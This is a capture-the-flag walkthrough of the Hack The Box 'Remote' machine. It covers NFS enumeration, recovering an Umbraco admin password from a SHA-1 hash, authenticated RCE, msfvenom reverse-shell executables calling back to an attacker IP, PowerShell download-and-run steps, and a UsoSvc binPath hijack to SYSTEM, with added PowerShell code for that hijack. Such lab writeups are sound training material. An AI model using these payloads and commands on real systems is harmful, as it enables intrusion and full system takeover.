Nmap Result

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-25 18:02 CEST
Nmap scan report for remote.htb (10.10.10.180)
Host is up (0.061s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 5m12s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-25T16:19:27
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 738.36 seconds

Information Gathering

The rpcbind output shows an NFS server (program 100003) on port 2049. Let's enumerate its exports:

showmount --exports 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

The /site_backups export is mountable by everyone, so let's mount it (the local mount point has to exist first):

sudo mount -t nfs 10.10.10.180:/site_backups /home/jack/htb/remote/site_backups_mount/

Inside it are backups of the web application's configuration and data files; the application is Umbraco, an ASP.NET CMS. Let's grep the backup for anything that looks like an unsalted hex digest (the MD5, SHA-1, SHA-256, SHA-384 and SHA-512 widths), using -a so binary files are searched as text:

grep -roE "([\" \'{\[\=]){0,1}(([a-f0-9]){128}|([a-f0-9]){96}|([a-f0-9]){64}|([a-f0-9]){40}|([a-f0-9]){32})([\" \'}\]\,]){0,1}" -a ./*

The only interesting hit was in /App_Data/Umbraco.sdf, a compact relational database in SQL Server Compact (SQL CE) format. The hash sits next to the record of the Umbraco admin account, [email protected]

The hash was b8be16afba8c314ad33d812f22a04991b90e2aaa (40 hex characters, the width of a SHA-1 digest), so I used Jack Hash Finder (jhf) to recover the original password.

./jhf b8be16afba8c314ad33d812f22a04991b90e2aaa
b8be16afba8c314ad33d812f22a04991b90e2aaa: baconandcheese
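Before trusting a lookup tool's answer it is worth confirming the candidate yourself, and the digest width tells you which algorithms to try. The following PowerShell is an added example, not code from the original writeup or from jhf; the function names are mine. It classifies a hex digest by its length (the same widths the grep above searches for) and checks a candidate password against every unsalted algorithm of that width, which is how this Umbraco hash turned out to be stored.

```powershell
# Added example (not from the original writeup or from jhf): classify a hex
# digest by its width and verify a candidate plaintext against it.

function Get-HashAlgorithmsByLength {
    param([Parameter(Mandatory)][string]$Hash)
    # Digest widths in hex characters, the same ones the grep regex looks for.
    $byLength = @{
        32  = @('MD5')
        40  = @('SHA1')
        64  = @('SHA256')
        96  = @('SHA384')
        128 = @('SHA512')
    }
    if ($Hash -notmatch '^[0-9a-fA-F]+$') { throw "Not a hex digest: $Hash" }
    $algs = $byLength[$Hash.Length]
    if (-not $algs) { throw "Unrecognised digest length: $($Hash.Length)" }
    return $algs
}

function Get-HexDigest {
    param([Parameter(Mandatory)][string]$Algorithm,
          [Parameter(Mandatory)][string]$Text)
    # Unsalted digest of the UTF-8 bytes, rendered as lowercase hex.
    $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($Algorithm)
    try {
        $bytes = $hasher.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Text))
        return ([System.BitConverter]::ToString($bytes)).Replace('-', '').ToLower()
    } finally {
        $hasher.Dispose()
    }
}

function Test-HashCandidate {
    param([Parameter(Mandatory)][string]$Hash,
          [Parameter(Mandatory)][string]$Candidate)
    $target = $Hash.ToLower()
    foreach ($alg in (Get-HashAlgorithmsByLength -Hash $Hash)) {
        if ((Get-HexDigest -Algorithm $alg -Text $Candidate) -eq $target) {
            return [pscustomobject]@{ Algorithm = $alg; Password = $Candidate; Match = $true }
        }
    }
    return [pscustomobject]@{ Algorithm = $null; Password = $Candidate; Match = $false }
}

# Usage: the admin hash from Umbraco.sdf and the password jhf returned.
Test-HashCandidate -Hash 'b8be16afba8c314ad33d812f22a04991b90e2aaa' -Candidate 'baconandcheese'
```

A Match of $true with Algorithm SHA1 confirms the credential is a plain, unsalted SHA-1 of the password; if the check had failed, the next thing to look at would be a salt or an encoding (base64 rather than hex) before spending more cracking time.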

Gaining Access

The Umbraco version running here is vulnerable to authenticated remote code execution (the exploit needs the admin credentials we just recovered), so I used this exploit: Umbraco-RCE
But first of all, I generated two reverse-shell executables with Metasploit, each calling back to a different port. I'll explain why later.

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.175 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -f exe -o ~/htb/remote/backdoor0.exe
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.175 LPORT=8888 -b "\x00" -e x86/shikata_ga_nai -f exe -o ~/htb/remote/backdoor1.exe

We also want to be ready for privilege escalation, so download PowerUp.ps1 into the same folder.

We need a web server so the target can fetch the backdoors from us. We can achieve this with Python: go into the folder holding the backdoors and the PS1 script and run the following command:

python3 -m http.server 8080

Now we're ready to use the exploit.
Open up the reverse shell handler

msfconsole -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LPORT 9999; set LHOST 10.10.14.175; run"

Download the first backdoor to the target machine (the exploit runs the given command as the web server's account):

python3 exploit.py -u [email protected] -p baconandcheese -i http://remote.htb/ -c powershell.exe -a "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/backdoor0.exe', '/Windows/TEMP/backdoor0.exe')"

Execute the backdoor; the handler on port 9999 should catch the shell:

python3 exploit.py -u [email protected] -p baconandcheese -i http://remote.htb/ -c powershell.exe -a "/Windows/TEMP/backdoor0.exe"

Now we have a shell on the machine.
We can retrieve the user flag with the following command:

more \Users\Public\user.txt

Privilege Escalation

Now we want a PowerShell prompt, since PowerUp.ps1 is a PowerShell module. After that, we'll load the module and run the function that collects all the information we need.
Get the PowerShell prompt (no profile, execution policy bypassed):

powershell.exe -nop -exec bypass

Downloading PowerUp.ps1

(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/PowerUp.ps1', '/Windows/TEMP/PowerUp.ps1')

Downloading the second backdoor:

(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.175:8080/backdoor1.exe', '/Windows/TEMP/backdoor1.exe')

Now we're ready to try privesc. Import PowerUp and run Invoke-AllChecks:

Import-Module /Windows/TEMP/PowerUp.ps1
Invoke-AllChecks

The module runs its checks and reports a service that our current user is allowed to reconfigure:

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'

Remember the second backdoor we generated? This is why we made two. Invoke-ServiceAbuse rewrites the service's binary path to the command we give it and restarts the service, so that command runs as the service account, which for UsoSvc is LocalSystem. Our current shell stays the low-privileged web user, so the privileged shell needs its own listener on port 8888.

Create a new reverse shell handler:

msfconsole -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LPORT 8888; set LHOST 10.10.14.175; run"

From our current (low-privileged) shell, abuse the service so it launches the second backdoor:

Invoke-ServiceAbuse -ServiceName 'UsoSvc' -Command '/Windows/TEMP/backdoor1.exe'

Done! The second handler receives a shell running as LocalSystem (NT AUTHORITY\SYSTEM).
Now we can read the root flag:

more \Users\Administrator\Desktop\root.txt
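What Invoke-ServiceAbuse did above, shown as a manual PowerShell equivalent. This is an added example, not code from the original writeup or from PowerUp, and the function names (Get-ServiceSddl, Test-ServiceAbusable, Invoke-ManualServiceAbuse) are mine. It reads the service's security descriptor with sc.exe sdshow, checks whether the current token holds SERVICE_CHANGE_CONFIG, SERVICE_START and SERVICE_STOP on the service, and only then swaps the binary path, restarts the service and restores the original path. It assumes Windows PowerShell 5.1 on the target, that sc.exe is available, and that a listener is already waiting on port 8888.

```powershell
# Added example (not from the original writeup or from PowerUp): check whether the
# current token can reconfigure and restart a service, then perform the same
# binPath hijack Invoke-ServiceAbuse does, restoring the original path afterwards.

# Service-specific access rights (winsvc.h); in SDDL these appear as DC, RP and WP.
$SERVICE_CHANGE_CONFIG = 0x0002
$SERVICE_START         = 0x0010
$SERVICE_STOP          = 0x0020
$GENERIC_ALL           = 0x10000000

function Get-ServiceSddl {
    param([Parameter(Mandatory)][string]$Name)
    # sc.exe prints a blank line followed by the SDDL string.
    $out  = & sc.exe sdshow $Name 2>&1
    $sddl = $out | Where-Object { "$_" -match '^\s*D:' } | Select-Object -First 1
    if (-not $sddl) { throw "Could not read the security descriptor of $Name : $out" }
    return "$sddl".Trim()
}

function Test-ServiceAbusable {
    param([Parameter(Mandatory)][string]$Name)
    $sd = New-Object -TypeName System.Security.AccessControl.RawSecurityDescriptor `
                     -ArgumentList (Get-ServiceSddl -Name $Name)
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # Every SID the current token carries: the user plus all group SIDs.
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $needed  = $SERVICE_CHANGE_CONFIG -bor $SERVICE_START -bor $SERVICE_STOP
    $granted = 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Deny ACEs are not evaluated in this simplified check.
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        if ($mySids -contains $ace.SecurityIdentifier.Value) {
            $granted = $granted -bor $ace.AccessMask
            if ($ace.AccessMask -band $GENERIC_ALL) { $granted = $granted -bor $needed }
        }
    }
    return [pscustomobject]@{
        Service         = $Name
        CanChangeConfig = [bool]($granted -band $SERVICE_CHANGE_CONFIG)
        CanStart        = [bool]($granted -band $SERVICE_START)
        CanStop         = [bool]($granted -band $SERVICE_STOP)
        Abusable        = (($granted -band $needed) -eq $needed)
    }
}

function Invoke-ManualServiceAbuse {
    param([Parameter(Mandatory)][string]$Name,
          [Parameter(Mandatory)][string]$Command,
          [int]$WaitSeconds = 5)
    $check = Test-ServiceAbusable -Name $Name
    if (-not $check.Abusable) { throw "Current token cannot reconfigure and restart $Name" }
    # Read the unexpanded ImagePath so the restore writes back exactly what was there.
    $key      = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $original = $key.GetValue('ImagePath', $null,
                  [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
    try {
        # Point the service at our command; the SCM launches it as the service
        # account (LocalSystem for UsoSvc) when the service is next started.
        & sc.exe config $Name binPath= "$Command" | Out-Null
        & sc.exe stop $Name | Out-Null
        Start-Sleep -Seconds $WaitSeconds
        # The payload is not a real service binary, so the SCM reports a start
        # timeout (error 1053) even though the process is already running.
        & sc.exe start $Name | Out-Null
        Start-Sleep -Seconds $WaitSeconds
    } finally {
        # Put the original path back so the service is not left broken.
        & sc.exe config $Name binPath= "$original" | Out-Null
    }
    return $original
}

# Usage as in the writeup (second handler listening on 8888 first):
#   Test-ServiceAbusable -Name 'UsoSvc'
#   Invoke-ManualServiceAbuse -Name 'UsoSvc' -Command 'C:\Windows\Temp\backdoor1.exe'
```

Run Test-ServiceAbusable on its own first: CanChangeConfig without CanStart or CanStop means you can plant the path but have to wait for a reboot or for something else to restart the service. The restore in the finally block is the part people forget when doing this by hand; leaving UsoSvc pointing at a payload that has since been deleted is both noisy and a sign that the box was touched.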